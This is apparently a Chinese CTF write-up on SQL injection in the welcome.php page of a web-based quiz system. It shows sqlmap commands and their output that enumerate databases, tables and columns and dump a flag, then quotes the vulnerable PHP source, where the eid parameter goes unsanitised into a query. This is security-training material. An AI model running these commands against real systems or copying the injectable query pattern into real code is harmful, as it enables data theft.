…
漏洞描述:该CMS的welcome.php中存在SQL注入攻击。
开启环境,随便注册个账号,在第二项的Ip Networking点击Start抓包,保存包信息为1.txt,并使用sqlmap跑
1
2
3
4
5
6
7
8
9
| sqlmap -r 1.txt --dbs ---batch --random-agent -p eid
------------------------------------------------------
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
available databases [4]:
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema
|
得到了数据库名,继续爆表名、列名、获取字段
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| sqlmap -r 1.txt -D ctf --batch --random-agent -p eid
----------------------------------------------------
Database: ctf
[9 tables]
+-----------+
| rank |
| user |
| admin |
| answer |
| flag |
| history |
| options |
| questions |
| quiz |
+-----------+
----------------------------------------------------------------------
sqlmap -r 1.txt -D ctf -T flag --columns --batch --random-agent -p eid
----------------------------------------------------------------------
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type |
+--------+---------------+
| flag | varchar(1024) |
+--------+---------------+
-----------------------------------------------------------------------
sqlmap -r 1.txt -D ctf -T flag -C flag --dump --batch --random-agent -p eid
-----------------------------------------------------------------------
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{b90b289c-0dc7-47c9-b6c8-80a7698873cc} |
+--------------------------------------------+
|
漏洞分析:该框架是web based quiz system v1.0的漏洞,在welcome.php页面存在sql注入漏洞,源码如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php
if (@$_GET['q'] == 'quiz' && @$_GET['step'] == 2)
{
$eid = @$_GET['eid'];
$sn = @$_GET['n'];
$total = @$_GET['t'];
$q = mysqli_query($con, "SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' ");
echo '<div class = "panel" style= "margin:5%">';
while ($row = mysqli_fetch_array($q))
{
$qns = $row['qns'];
$qid = $row['qid'];
echo '<b>Question '.$sn.' ::<br /><br />'.$qns.'</b><br /><br />';
}
}
|
eid可控,构造sql语句传入到mysqli_query即可达成sql注入